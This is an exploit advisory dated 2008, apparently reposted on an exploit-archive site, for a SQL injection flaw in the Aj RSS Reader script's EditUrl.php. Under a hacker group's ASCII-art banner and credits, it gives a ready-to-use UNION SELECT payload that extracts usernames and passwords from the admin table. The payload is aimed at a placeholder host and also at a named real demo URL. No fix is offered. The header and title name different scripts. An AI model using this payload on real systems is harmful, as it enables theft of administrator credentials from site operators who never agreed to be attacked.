Aj RSS Reader (EditUrl.php url) SQL Injection Vulnerability

2008-10-24 21:01:03

==================================================================================================================
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
S N N N A A K K E S T E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
S N N N A A K K E S T E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
===================================================SNAKES TEAM====================================================
+ =
= AJ Forced Matrix Script Remote SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: yassine_enp :::ALGERIAN HaCkEr::: = =
= =
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
= =
= = :::::Mail: [email protected]::::::: = =
= =
= = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::= =
= nome de script :rss_reader
=
======================================yassine_enp===================================


Exploit(1):
********

www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--

Demo
________

http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--





===================================================================================================================

Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members

===================================================================================================================

::::[email protected]::::

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.